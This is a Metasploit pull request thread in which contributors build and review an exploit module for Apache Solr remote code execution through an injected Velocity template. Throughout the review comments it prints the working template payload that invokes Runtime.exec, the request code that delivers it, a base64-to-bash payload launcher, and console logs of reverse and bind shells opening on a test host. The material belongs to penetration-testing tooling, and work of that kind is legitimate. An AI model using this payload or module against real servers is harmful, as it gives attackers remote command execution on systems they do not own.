Apache Solr Remote Code Execution via Velocity Template
rapid7/metasploit-framework pull request #12759
Opened 2019-12-26 10:58 UTC by ide0x90

## Overview

This is a module for the vulnerability present in Apache Solr <= 8.3.0 which allows remote code execution via a custom Velocity template. Tested on Windows and Unix for the following Solr versions:

- [x] 8.3.0
- [x] 7.7.2
- [x] 6.6.6
- [x] 5.5.5

**Windows test system**: `Windows Server 2019 Datacenter 10.0.17763 N/A Build 17763`, running Solr natively
**Unix test system**: `Linux automata 5.3.0-kali3-amd64 #1 SMP Debian 5.3.15-1kali1 (2019-12-09) x86_64 GNU/Linux`, running Solr on Docker

CmdStager doesn't seem to work for Windows systems, rendering the module useless if PowerShell is not present. On the Unix side of things, plain old `/bin/sh` does not work, so I have resorted to using `/bin/bash`. Also, Base64 encoded payloads don't work in Unix, so Base32 was used instead.

Payload defaults to `windows/meterpreter/reverse_tcp` on Windows and `cmd/unix/reverse_bash` on Unix. I have attempted target verification in the module so that it auto-aborts the exploit if the victim is detected to be one platform, but the selected target is another.

## Recreation of Test Environment

The easiest way to setup the vulnerable environment is to use the example `techproducts` core included with every Solr install.

### For Unix, using Solr 8.3.0 as an example

1. `docker pull solr:8.3.0`
2. `docker run --name solr_830 -d -p 8983:8983 -t solr:8.3.0`
3. `docker exec -it --user=solr solr_830 bin/solr create -c techproducts -d sample_techproducts_configs`
4. `docker exec -it --user=solr solr_830 bash`
5. Within the Docker Bash: `bin/post -c techproducts example/exampledocs/*.xml`

Or just download the releases of the Solr VM from Bitnami (https://downloads.bitnami.com/files/stacks/solr/8.3.0-0/bitnami-solr-8.3.0-0-linux-debian-9-x86_64.ova) and configure it the same way. The VM has the added bonus of already having authentication configured. A bit of URL tweaking will allow the downloading of older releases of the Solr VM from Bitnami.

### For Windows, using Solr 8.3.0 as an example

1. Download Solr for Windows (https://archive.apache.org/dist/lucene/solr/8.3.0/solr-8.3.0.zip)
2. Extract the archive
3. Navigate to the `bin` directory of the extracted archive, and run `solr -e techproducts`

## Verification

- [x] Start `msfconsole`
- [x] `use exploit/multi/http/solr_velocity_rce`
- [x] `set RHOST <target_ip>`
- [x] `set RPORT <target_port>`
- [x] `set USERNAME <username>` (if applicable)
- [x] `set PASSWORD <password>` (if applicable)
- [x] Ideally run `check`
- [x] `set TARGET` based on output of `check`
- [x] `set PAYLOAD <payload_name>` if you want to use other payloads
- [x] `set LHOST <your_ip>`
- [x] `set LPORT <your_port>`
- [x] `exploit` and let the shells rain

## TODO

- [ ] Improve target verification
- [ ] Determine a workaround for CmdStager if possible
- [ ] Manual check for PowerShell (in case `where powershell` fails to find it)
- [ ] Check for existence of `bash` (via `which bash` and manually if it fails)
- [ ] Documentation

2019-12-26 11:34 UTC, bcoles commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +  #
Remove

2019-12-26 11:34 UTC, bcoles commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +        # We encourage consistency between module name and file name.
Remove

2019-12-26 11:34 UTC, bcoles commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +            's00py',
```suggestion
            's00py', # Discovery and PoC
```

2019-12-26 11:34 UTC, bcoles commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +        OptString.new('PASSWORD', [false, 'Solr password (default is SolrRocks)', ''])
If `solr` and `SolrRocks` are the defaults, then please add them as defaults.

2019-12-26 11:34 UTC, bcoles commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +    unless auth_check.code == 200
`auth_check` could be `nil`.

Add the following check first:

```ruby
unless auth_check
  return CheckCode::Unknown('Connection failed')
end
```

2019-12-26 11:34 UTC, bcoles commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +      if datastore['USERNAME'] == nil and datastore['PASSWORD'] == nil
Can these ever be `nil`? They're defined as `OptString`. I would hope that they would be empty strings, not `nil`.

2019-12-26 11:34 UTC, bcoles commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +          'uri'     => '/solr/admin/info/system?wt=json'
Please use `vars_get` for HTTP GET parameters.

2019-12-26 11:34 UTC, bcoles commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +                         'uri'     => "/solr/#{opts['core_name']}/select?q=1&wt=velocity&v.template=custom&v.template.custom=#{@weaponized_template}",
Please use `vars_get` for HTTP GET parameters.

2019-12-26 11:34 UTC, bcoles commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +            'uri'     => '/solr/admin/cores?wt=json'
Please use `vars_get` for HTTP GET parameters.

2019-12-26 11:36 UTC, bcoles commented
> CmdStager doesn't seem to work for Windows systems, rendering the module useless if PowerShell is not present. On the Unix side of things, plain old `/bin/sh` does not work, so I have resorted to using `/bin/bash`.

Strange. If I had to guess, I would presume it is an issue with URL encoding. This problem might go away if you switch over to using `vars_get` for HTTP GET parameters (which is preferred).

> Also, Base64 encoded payloads don't work in Unix, so Base32 was used instead.

Also strange ...

2019-12-26 15:07 UTC, acammack-r7 commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +    @weaponized_template = @custom_template.gsub("PAYLOAD_HERE", cmd)
These don't need to be instance variables, and we should probably make the template more readable, along the lines of:
```ruby
template = '#set($x="") ' \
    '#set($rt=$x.class.forName("java.lang.Runtime")) ' \
    '#set($chr=$x.class.forName("java.lang.Character")) ' \
    '#set($str=$x.class.forName("java.lang.String")) ' \
    '#set($ex=$rt.getRuntime().exec("' + cmd + '")) ' \
    '$ex.waitFor() #set($out=$ex.getInputStream()) ' \
    '#foreach($i in [1..$out.available()])' \
      '$str.valueOf($chr.toChars($out.read()))' \
    '#end'
```

Additionally, we should try to structure this method so that it (or preferably `send_request_cgi`) does all the encoding to allow this module to be more readable and extensible. If we use `vars_get` as mentioned below it will happen automatically.

2019-12-26 15:48 UTC, ide0x90 commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +  #
Fixed in commit 046d8cbedc659abf7ec2edeb922b3df71c046a22.

2019-12-26 15:48 UTC, ide0x90 commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +        # We encourage consistency between module name and file name.
Fixed in commit 046d8cbedc659abf7ec2edeb922b3df71c046a22.

2019-12-26 15:48 UTC, ide0x90 commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +            's00py',
I could have sworn... fixed in commit 046d8cbedc659abf7ec2edeb922b3df71c046a22.

2019-12-26 15:48 UTC, ide0x90 commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +    unless auth_check.code == 200
Fixed in commit 046d8cbedc659abf7ec2edeb922b3df71c046a22.

2019-12-26 15:48 UTC, ide0x90 commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +          'uri'     => '/solr/admin/info/system?wt=json'
Unnecessary, got removed in commit 046d8cbedc659abf7ec2edeb922b3df71c046a22.

2019-12-26 15:48 UTC, ide0x90 commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +            'uri'     => '/solr/admin/cores?wt=json'
Unnecessary, removed in commit 046d8cbedc659abf7ec2edeb922b3df71c046a22.

2019-12-26 15:49 UTC, ide0x90 commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +                         'uri'     => "/solr/#{opts['core_name']}/select?q=1&wt=velocity&v.template=custom&v.template.custom=#{@weaponized_template}",
Fixed in commit 046d8cbedc659abf7ec2edeb922b3df71c046a22.

2019-12-26 15:49 UTC, ide0x90 commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +    @weaponized_template = @custom_template.gsub("PAYLOAD_HERE", cmd)
Thanks for the cleanup. Space is an illegal character, so I've replaced that with `+`. The encoding by `send_request_cgi` isn't conducive for Solr it seems, so I've used a mishmash of `URI.encode` and `Rex::Text.uri_encode` which seems to work fine for both Unix and Windows. I'm fairly certain that isn't the way it is supposed to be done though...

2019-12-26 15:49 UTC, ide0x90 commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +      if datastore['USERNAME'] == nil and datastore['PASSWORD'] == nil
You are right, they ought to be empty strings. Fixed in commit 046d8cbedc659abf7ec2edeb922b3df71c046a22.

2019-12-26 16:02 UTC, bcoles commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +      # on Unix, works best with bash, got some serious beef with plain old sh (something to do with bad file descriptors)
Did you also run into the same issues when using quotes rather than `{ }` ?

2019-12-26 16:18 UTC, ide0x90 commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +###
Fixed in latest commit.

2019-12-26 16:19 UTC, ide0x90 commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +require 'json'
Fixed in latest commit.

2019-12-26 16:19 UTC, ide0x90 commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +      unless targets[datastore['TARGET']].name.include? "Windows"
Fixed in latest commit.

2019-12-26 16:19 UTC, ide0x90 commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +      unless targets[datastore['TARGET']].name.include? "Unix"
Fixed in latest commit.

2019-12-26 16:20 UTC, ide0x90 commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +      # on Unix, works best with bash, got some serious beef with plain old sh (something to do with bad file descriptors)
Tbf, I never tried using `{ }`. Could I please have an example?

2019-12-26 16:20 UTC, ide0x90 commented
*&^!*(&%^)(*&!(!*% GIT

2019-12-26 16:20 UTC, ide0x90 commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +      unless update_config.code == 200
Fixed in latest commit.

2019-12-26 16:23 UTC, bcoles commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +    deregister_options('SRVPORT')
Is there a reason to deregister these options. They're used by some of the command stagers.

2019-12-26 16:23 UTC, bcoles commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +        OptString.new('PASSWORD', [false, 'Solr password (default is SolrRocks)', 'SolrRocks'])
Now that you've updated the default values, it is unnecessary to also list the defaults in the option descriptions.

2019-12-26 16:23 UTC, bcoles commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +        'DefaultOptions' => { 'TARGET'  => 1 },
```suggestion
        'DefaultTarget'  => 1,
```

2019-12-26 16:23 UTC, bcoles commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +            #[ 'CVE', 'CVE-1111-2222'],
```suggestion
            #[ 'CVE', 'CVE-1111-2222'],
```

I'm guessing a CVE won't be issued for this one.

2019-12-26 16:23 UTC, bcoles commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +        unless attempt_auth.code == 200
`attempt_auth` could be `nil`. Check first.

2019-12-26 16:23 UTC, bcoles commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +         'uri'           => "/solr/#{opts['core_name']}/select",
This should probably be normalized. Also, the module should probably expose a `TARGETURI` option.

```suggestion
         'uri'           => normalize_uri(target_uri.path, '/solr/', opts['core_name'].to_s, 'select'),
```

2019-12-26 16:29 UTC, bcoles commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +      # on Unix, works best with bash, got some serious beef with plain old sh (something to do with bad file descriptors)
> Tbf, I never tried using `{ }`.

You used six of them, right there:

![lies](https://user-images.githubusercontent.com/434827/71482802-99282700-2858-11ea-985b-12c11e9b8c6b.png)

2019-12-26 16:32 UTC, bcoles commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +      # on Unix, works best with bash, got some serious beef with plain old sh (something to do with bad file descriptors)
> Could I please have an example?

There's a few things going on here. Encoding issues need to be resolved first. @acammack-r7 will happily take over from here. I'll check back in tomorrow.

2019-12-26 18:22 UTC, acammack-r7 commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +    @weaponized_template = @custom_template.gsub("PAYLOAD_HERE", cmd)
Maybe the encoding mode you want is `CGI::escape`? Either of those two encoding methods you are using will replace spaces with `%20`, but something may be getting mad about that. `CGI::escape` does normal hex escaping, but also uses `+` for space.

2019-12-27 03:01 UTC, bcoles commented
For those playing along at home using the Bitnami image:

```
$ sudo -s
### Out of laziness, I disabled the firewall entirely (you'll need port 8983 open at minimum) :
# sudo iptables -A INPUT -i ens160 -j ACCEPT
### create the techproducts core
# su - solr
$ /opt/bitnami/apache-solr/bin/solr create -c techproducts -d sample_techproducts_configs
```

I took a look into fixing the encoding. The issue was due to the hard-coded `+`instead of spaces, and manually trying to perform URL encoding with `uri_encode` and `CGI.escape`, which doesn't play well with Metasploit's automatic URL encoding when `encode_params: true`.

```ruby
  # sic 'em, bois!
  def execute_command(cmd, opts = {}) 
    # custom template which enables command execution. cmd must be uri-encoded, or the exploit fials
    template = ('#set($x="") ' \
    '#set($rt=$x.class.forName("java.lang.Runtime")) ' \
    '#set($chr=$x.class.forName("java.lang.Character")) ' \
    '#set($str=$x.class.forName("java.lang.String")) ' \
    '#set($ex=$rt.getRuntime().exec("PAYLOAD_HERE")) ' \
    '$ex.waitFor() #set($out=$ex.getInputStream()) ' \
    '#foreach($i in [1..$out.available()])' \
      '$str.valueOf($chr.toChars($out.read()))' \
    '#end').gsub("PAYLOAD_HERE", cmd)

    # execute the exploit...
    send_request_cgi({
         'method'        => 'GET',
         'uri'           => "/solr/#{opts['core_name']}/select",
         'headers'       => @headers,
         'vars_get'      => {
             'q'                 => '1',
             'wt'                => 'velocity',
             'v.template'        => 'custom',
             'v.template.custom' => template
         }
      })
  end
```

Hopefully this should get you on the right track. Works with a few bind and reverse payloads:

```
msf5 exploit(multi/http/solr_velocity_rce) > rexploit 
[*] Reloading module...

[*] Found Apache Solr 8.3.0
[*] OS version is Linux amd64 4.9.0-11-amd64
[*] Full uname is 'Linux debian 4.9.0-11-amd64 #1 SMP Debian 4.9.189-3+deb9u1 (2019-09-20) x86_64 GNU/Linux'
[+] Found core(s): techproducts
[+] Found Velocity Response Writer in use by core techproducts
[+] params.resource.loader.enabled for core 'techproducts' is set to true.
[*] Started bind TCP handler against 10.1.1.194:4444
[*] Command shell session 1 opened (172.16.191.165:33879 -> 10.1.1.194:4444) at 2019-12-26 21:34:18 -0500

id
uid=999(solr) gid=1002(solr) groups=1002(solr)
^C
Abort session 1? [y/N]  y
""

[*] 10.1.1.194 - Command shell session 1 closed.  Reason: User exit
```

```
msf5 exploit(multi/http/solr_velocity_rce) > set payload cmd/unix/bind_awk 
payload => cmd/unix/bind_awk
msf5 exploit(multi/http/solr_velocity_rce) > run

[*] Found Apache Solr 8.3.0
[*] OS version is Linux amd64 4.9.0-11-amd64
[*] Full uname is 'Linux debian 4.9.0-11-amd64 #1 SMP Debian 4.9.189-3+deb9u1 (2019-09-20) x86_64 GNU/Linux'
[+] Found core(s): techproducts
[+] Found Velocity Response Writer in use by core techproducts
[+] params.resource.loader.enabled for core 'techproducts' is set to true.
[*] Started bind TCP handler against 10.1.1.194:4444
[*] Command shell session 4 opened (172.16.191.165:46503 -> 10.1.1.194:4444) at 2019-12-26 21:46:53 -0500

id
uid=999(solr) gid=1002(solr) groups=1002(solr)
^C
Abort session 4? [y/N]  y
""

[*] 10.1.1.194 - Command shell session 4 closed.  Reason: User exit
```

```
msf5 exploit(multi/http/solr_velocity_rce) > set payload cmd/unix/reverse_bash
payload => cmd/unix/reverse_bash
msf5 exploit(multi/http/solr_velocity_rce) > run

[*] Started reverse TCP handler on 10.1.1.170:4444 
[*] Found Apache Solr 8.3.0
[*] OS version is Linux amd64 4.9.0-11-amd64
[*] Full uname is 'Linux debian 4.9.0-11-amd64 #1 SMP Debian 4.9.189-3+deb9u1 (2019-09-20) x86_64 GNU/Linux'
[+] Found core(s): techproducts
[+] Found Velocity Response Writer in use by core techproducts
[+] params.resource.loader.enabled for core 'techproducts' is set to true.
[*] Command shell session 5 opened (10.1.1.170:4444 -> 10.1.1.194:49994) at 2019-12-26 21:48:36 -0500

id
uid=999(solr) gid=1002(solr) groups=1002(solr)

```

2019-12-27 03:26 UTC, bcoles commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +    @weaponized_template = @custom_template.gsub("PAYLOAD_HERE", cmd)
The automatic encoding used by `send_request_cgi` is sufficient. https://github.com/rapid7/metasploit-framework/pull/12759#issuecomment-569173960

2019-12-27 03:51 UTC, bcoles commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +      # on Unix, works best with bash, got some serious beef with plain old sh (something to do with bad file descriptors)
I've fixed the encoding (https://github.com/rapid7/metasploit-framework/pull/12759#issuecomment-569173960) and took a bit of a look into this.

The payload works fine (at least, on the Bitnami Linux vm) when encoded with `payload.encoded`, which is preferred over `payload.raw` or `generate_payload().raw`.

```ruby
      # base64 payload has to be URI encoded
      b64_payload = Rex::Text.encode_base64(payload.encoded) #generate_payload().raw)
      # on Unix, works best with bash, got some serious beef with plain old sh (something to do with bad file descriptors)
      bash_payload = "bash -c {echo,#{b64_payload}}|{base64,-d}|{bash,-i}"
      # prepare to exploit...
      execute_command(bash_payload, {'core_name' => @core_name})
```

You're right about spaces being problematic. Using `{ }`, as you're doing now, is the best approach.

However, given that you can effectively execute arbitrary Java code, it would be much cleaner to perform the Base64 decoding within the Java code, rather than as arguments to the system shell, which is error prone. This will remove a lot of inconsistency and make debugging further issues much easier.

ie, something like this:

```ruby
  def execute_command(cmd, opts = {})
  # ...
  cmd = Rex::Text.encode_base64(cmd)
  # ...
  template = "" +
  # ...
  "rt.getRuntime().exec(java.util.Base64.decoder.decode('#{cmd}'))"
  # ...
```

This way you don't need to worry about `BadChars` within the Java code (ie, `0x22`), ensuring a consistent state when the payload reaches the target.

If that makes sense?

2019-12-27 07:17 UTC, ide0x90 commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +    deregister_options('SRVPORT')
I suppose not. Added them back in commit ce011375252e6b61502c7f33e58024e7fcbbf906.

2019-12-27 07:18 UTC, ide0x90 commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +        OptString.new('PASSWORD', [false, 'Solr password (default is SolrRocks)', 'SolrRocks'])
Fixed in commit ce011375252e6b61502c7f33e58024e7fcbbf906.

2019-12-27 07:41 UTC, ide0x90 commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +        'DefaultOptions' => { 'TARGET'  => 1 },
Fixed in commit ce011375252e6b61502c7f33e58024e7fcbbf906.

2019-12-27 07:41 UTC, ide0x90 commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +            #[ 'CVE', 'CVE-1111-2222'],
Fixed in commit ce011375252e6b61502c7f33e58024e7fcbbf906.

2019-12-27 07:41 UTC, ide0x90 commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +        unless attempt_auth.code == 200
Fixed in commit ce011375252e6b61502c7f33e58024e7fcbbf906.

2019-12-27 07:41 UTC, ide0x90 commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +         'uri'           => "/solr/#{opts['core_name']}/select",
Fixed in commit ce011375252e6b61502c7f33e58024e7fcbbf906.

2019-12-27 07:44 UTC, bcoles commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +         'uri'           => "/solr/#{opts['core_name']}/select",
The module should probably expose a `TARGETURI` option, and `normalize_uri(target_uri.path, ...)` used for each `'uri'` key of each `send_request_cgi` call.

Presumably, `/solr/` would be a reasonable default for `TARGETURI`.

2019-12-27 07:44 UTC, ide0x90 commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +    @weaponized_template = @custom_template.gsub("PAYLOAD_HERE", cmd)
Aye, that it is. Fixed in commit ce011375252e6b61502c7f33e58024e7fcbbf906.

2019-12-27 07:50 UTC, ide0x90 commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +         'uri'           => "/solr/#{opts['core_name']}/select",
Gah. Added TARGETURI option in commit 65e7354ee6a700f6da0846d4b4edacfefb090806.

2019-12-27 07:53 UTC, bcoles commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +    # custom template which enables command execution. cmd must be uri-encoded, or the exploit fials
```suggestion
    # custom template which enables command execution. cmd must be uri-encoded, or the exploit fails
```

Also, is `cmd must be uri-encoded` still relevant ?

2019-12-27 07:53 UTC, bcoles commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +    template = ('#set($x="") ' \
I haven't tested, but it might be safe to use newlines, in which case this would be cleaner as a `heredoc`:

```ruby
    template = <<-EOF
      #set($x="")
      #set($rt=$x.class.forName("java.lang.Runtime"))
      #set($chr=$x.class.forName("java.lang.Character"))
      #set($str=$x.class.forName("java.lang.String"))
      #set($ex=$rt.getRuntime().exec("#{cmd}"))
      $ex.waitFor() #set($out=$ex.getInputStream())
      #foreach($i in [1..$out.available()])
        $str.valueOf($chr.toChars($out.read()))
      #end
EOF
```

2019-12-27 07:53 UTC, bcoles commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +    @solr_version = Gem::Version.new(ver_json['lucene']['solr-spec-version'])
`@solr_version` is used only 3 times, all within this method. It doesn't need to be a class variable.

```suggestion
    solr_version = Gem::Version.new(ver_json['lucene']['solr-spec-version'])
```

2019-12-27 07:53 UTC, bcoles commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +    print_status("Found Apache Solr #{@solr_version}")
```suggestion
    print_status("Found Apache Solr #{solr_version}")
```

2019-12-27 07:53 UTC, bcoles commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +    unless @solr_version <= Gem::Version.new('8.3.0')
```suggestion
    unless solr_version <= Gem::Version.new('8.3.0')
```

2019-12-27 07:53 UTC, bcoles commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +        'Connection'   => 'Keep-Alive',
`'Connection'   => 'Keep-Alive',` appears in both branches of the conditional. Unnecessary.

2019-12-27 07:53 UTC, bcoles commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +        'Authorization'   => @auth_string.to_s
Is there a reason to use `Authorization` as a `header` ? The `send_request_cgi` method supports a `authorization` key, which is the preferred approach.

2019-12-27 08:09 UTC, bcoles commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +      else
The positive conditional branch returns. The following ~25 lines don't need to be in a conditional branch.

2019-12-27 08:09 UTC, bcoles commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +                 'uri'     => '/solr/'
```suggestion
                 'uri'     => normalize_uri(target_uri.path),
```

2019-12-27 08:09 UTC, bcoles commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +                       'uri'     => '/solr/'
```suggestion
                       'uri'     => normalize_uri(target_uri.path)
```

2019-12-27 08:09 UTC, bcoles commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +          'uri'     => '/solr/admin/info/system'
```suggestion
          'uri'     => normalize_uri(target_uri.path, '/admin/info/system')
```

2019-12-27 08:09 UTC, bcoles commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +            'uri'     => '/solr/admin/cores'
```suggestion
            'uri'     => normalize_uri(target_uri.path, '/admin/cores')
```

2019-12-27 08:09 UTC, bcoles commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +                    'uri'     => "/solr/#{core_name}/config"
```suggestion
                    'uri'     => normalize_uri(target_uri.path, core_name.to_s, 'config')
```

2019-12-27 08:09 UTC, bcoles commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +                      'uri'           => "/solr/#{@core_name}/config",
```suggestion
                      'uri'           => normalize_uri(target_uri.path, @core_name.to_s, 'config')
```

2019-12-27 08:09 UTC, bcoles commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +    @possibly_vulnerable_cores = Array.new()
This doesn't need to be a class variable.

```suggestion
    possibly_vulnerable_cores = []
```

2019-12-27 08:09 UTC, bcoles commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +        @possibly_vulnerable_cores.push(core_name)
```suggestion
        possibly_vulnerable_cores.push(core_name)
```

2019-12-27 08:09 UTC, bcoles commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +        unless @possibly_vulnerable_cores == nil
You probably want to check `.empty?` here.

```suggestion
        unless possibly_vulnerable_cores.empty?
```

2019-12-27 08:09 UTC, bcoles commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +    if @possibly_vulnerable_cores == nil
You probably want to check `empty?` here.

```suggestion
    if possibly_vulnerable_cores.empty?
```

2019-12-27 08:09 UTC, bcoles commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +  @auth_string = ""
The `vuln_check` design paradigm does will cause issues. ie, what if a user changes `rhosts` after running `check` ?

Rather than storing data from within `check` to be used in `exploit`, the functionality should be split into reusable methods and called as needed.

2019-12-28 17:33 UTC, ide0x90 commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +    # custom template which enables command execution. cmd must be uri-encoded, or the exploit fials
Nope. Kicked in commit daae0886fa2080113de149c45eceb478c6b9ad29.

2019-12-28 17:35 UTC, ide0x90 commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +    @solr_version = Gem::Version.new(ver_json['lucene']['solr-spec-version'])
Fixed in commit daae0886fa2080113de149c45eceb478c6b9ad29

2019-12-28 17:35 UTC, ide0x90 commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +    template = ('#set($x="") ' \
The output of the command executed using the heredoc shows up as a single character per line (e.g. `/bin/bash` would show up as `/`, then `b`, then `i` etc. all in separate lines), unless the last 3 lines before the EOF are combined into a single line. In any case, I have included the heredoc as a comment in commit daae0886fa2080113de149c45eceb478c6b9ad29.

2019-12-28 17:35 UTC, ide0x90 commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +    print_status("Found Apache Solr #{@solr_version}")
Fixed in commit daae0886fa2080113de149c45eceb478c6b9ad29

2019-12-28 17:35 UTC, ide0x90 commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +    unless @solr_version <= Gem::Version.new('8.3.0')
Fixed in commit daae0886fa2080113de149c45eceb478c6b9ad29

2019-12-28 17:35 UTC, ide0x90 commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +        'Connection'   => 'Keep-Alive',
Aye. Kicked in commit daae0886fa2080113de149c45eceb478c6b9ad29

2019-12-28 17:36 UTC, ide0x90 commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +        'Authorization'   => @auth_string.to_s
I wanted to keep the headers clean in case there was no authentication required. In commit daae0886fa2080113de149c45eceb478c6b9ad29 I have stopped using the `@headers` variable, so it's redundant now.

2019-12-28 17:36 UTC, ide0x90 commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +      else
Fixed in commit daae0886fa2080113de149c45eceb478c6b9ad29

2019-12-28 17:36 UTC, ide0x90 commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +                 'uri'     => '/solr/'
Fixed in commit daae0886fa2080113de149c45eceb478c6b9ad29

2019-12-28 17:36 UTC, ide0x90 commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +                       'uri'     => '/solr/'
Fixed in commit daae0886fa2080113de149c45eceb478c6b9ad29

2019-12-28 17:36 UTC, ide0x90 commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +          'uri'     => '/solr/admin/info/system'
Fixed in commit daae0886fa2080113de149c45eceb478c6b9ad29

2019-12-28 17:36 UTC, ide0x90 commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +            'uri'     => '/solr/admin/cores'
Fixed in commit daae0886fa2080113de149c45eceb478c6b9ad29

2019-12-28 17:36 UTC, ide0x90 commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +                    'uri'     => "/solr/#{core_name}/config"
Fixed in commit daae0886fa2080113de149c45eceb478c6b9ad29

2019-12-28 17:36 UTC, ide0x90 commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +                      'uri'           => "/solr/#{@core_name}/config",
Fixed in commit daae0886fa2080113de149c45eceb478c6b9ad29

2019-12-28 17:36 UTC, ide0x90 commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +    @possibly_vulnerable_cores = Array.new()
Fixed in commit daae0886fa2080113de149c45eceb478c6b9ad29

2019-12-28 17:36 UTC, ide0x90 commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +        @possibly_vulnerable_cores.push(core_name)
Fixed in commit daae0886fa2080113de149c45eceb478c6b9ad29

2019-12-28 17:36 UTC, ide0x90 commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +        unless @possibly_vulnerable_cores == nil
Redundant as of commit daae0886fa2080113de149c45eceb478c6b9ad29

2019-12-28 17:36 UTC, ide0x90 commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +    if @possibly_vulnerable_cores == nil
Fixed in commit daae0886fa2080113de149c45eceb478c6b9ad29

2019-12-28 17:37 UTC, ide0x90 commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +  @auth_string = ""
That is true, and the `@vuln_check` variable is gone as of commit daae0886fa2080113de149c45eceb478c6b9ad29.

2019-12-28 18:09 UTC, ide0x90 commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +      # on Unix, works best with bash, got some serious beef with plain old sh (something to do with bad file descriptors)
It does make sense. Unfortunately, I haven't yet found a way to convert the `byte[]` array into a `String` in a Velocity template.

2019-12-29 01:46 UTC, bcoles commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +    template = ('#set($x="") ' \
I'm not sure what you mean? A heredoc is a string.

```
# irb
irb(main):001:0> cmd = 'placeholder'
=> "placeholder"
irb(main):002:0> template = <<-EOF
irb(main):003:0"  #set($x="")
irb(main):004:0"  #set($rt=$x.class.forName("java.lang.Runtime"))
irb(main):005:0"  #set($chr=$x.class.forName("java.lang.Character"))
irb(main):006:0"  #set($str=$x.class.forName("java.lang.String"))
irb(main):007:0"  #set($ex=$rt.getRuntime().exec("#{cmd}"))
irb(main):008:0"  $ex.waitFor() #set($out=$ex.getInputStream())
irb(main):009:0"  #foreach($i in [1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end
irb(main):010:0" EOF
=> " #set($x=\"\")\n #set($rt=$x.class.forName(\"java.lang.Runtime\"))\n #set($chr=$x.class.forName(\"java.lang.Character\"))\n #set($str=$x.class.forName(\"java.lang.String\"))\n #set($ex=$rt.getRuntime().exec(\"placeholder\"))\n $ex.waitFor() #set($out=$ex.getInputStream())\n #foreach($i in [1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end\n"
irb(main):011:0> puts template
 #set($x="")
 #set($rt=$x.class.forName("java.lang.Runtime"))
 #set($chr=$x.class.forName("java.lang.Character"))
